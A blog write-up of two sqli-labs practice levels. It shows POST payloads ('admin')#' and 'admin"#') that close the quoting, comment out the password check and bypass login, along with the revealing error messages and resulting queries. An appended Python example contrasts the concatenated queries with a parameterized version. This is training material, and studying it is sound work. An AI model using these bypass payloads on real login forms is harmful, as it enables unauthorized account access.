Chybeta

Sqli-Labs:Less13~14-writeup

Sqli-Labs is a good platform for practising SQL injection. Project address: https://github.com/Audi-1/sqli-labs
Test environment for this article: the phpstudy bundled environment. MySQL version: 5.5.53

Less-13 POST- Double Injection -Single quotes -String-with twist
Less-14 POST- Double Injection -Single quotes -String-with twist

Less 13

When the POST data is:

uname=admin'&passwd=chybeta&submit=Submit

The error message is:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta') LIMIT 0,1' at line 1

This shows the value is wrapped in parentheses, which need to be closed as well.

When the POST data is:

uname=admin')#&passwd=chybeta&submit=Submit

The page reports that the login succeeded.

The backend query becomes:

SELECT username, password FROM users WHERE username=('admin')#') and password=('chybeta') LIMIT 0,1

Less 14

When the POST data is:

uname=admin"&passwd=chybeta&submit=Submit

The error message is:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta" LIMIT 0,1' at line 1

When the POST data is:

uname=admin&passwd=chybeta"&submit=Submit

The error message is:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"chybeta"" LIMIT 0,1' at line 1

From these messages we can tell that the values are wrapped in double quotes, which need to be closed.

Payload:

uname=admin"#&passwd=chybeta&submit=Submit

The page reports that the login succeeded.

The backend query becomes:

SELECT username, password FROM users WHERE username="admin"#" and password="chybeta" LIMIT 0,1
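As an added example (not code from the original post or from the sqli-labs project), the Less-13 and Less-14 query templates rebuilt by string concatenation next to a parameterized version of the same lookup; the in-memory sqlite3 users table and the admin/admin credentials are constructed stand-ins for the lab's MySQL database.

```python
import sqlite3

# Query templates of Less-13 and Less-14 as shown above; {u} and {p} stand
# for the raw uname/passwd POST fields that the lab's PHP concatenates in.
TEMPLATES = {
    13: "SELECT username, password FROM users WHERE username=('{u}') and password=('{p}') LIMIT 0,1",
    14: 'SELECT username, password FROM users WHERE username="{u}" and password="{p}" LIMIT 0,1',
}


def build_unsafe(level: int, uname: str, passwd: str) -> str:
    """Concatenation exactly as the lab does it: the input becomes part of the SQL."""
    return TEMPLATES[level].format(u=uname, p=passwd)


def mysql_effective(sql: str) -> str:
    """The part MySQL still evaluates once a '#' line comment starts.
    Simplification: assumes the first '#' is outside a string literal,
    which holds for the payloads discussed on this page."""
    return sql.split("#", 1)[0].rstrip()


def make_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the lab's users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin')")
    return conn


def login_safe(conn: sqlite3.Connection, uname: str, passwd: str):
    """Hardened form: bound parameters keep quotes, parentheses and '#'
    inside the value, so the same inputs can no longer change the query
    shape. Database errors are swallowed instead of being echoed to the
    client, so the error text cannot reveal how the value is quoted."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 1"
    try:
        return conn.execute(sql, (uname, passwd)).fetchone()
    except sqlite3.Error:
        return None
```

With the page's inputs, `mysql_effective` shows that everything after `username=('admin')` is commented out, while `login_safe` returns no row for those same inputs.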
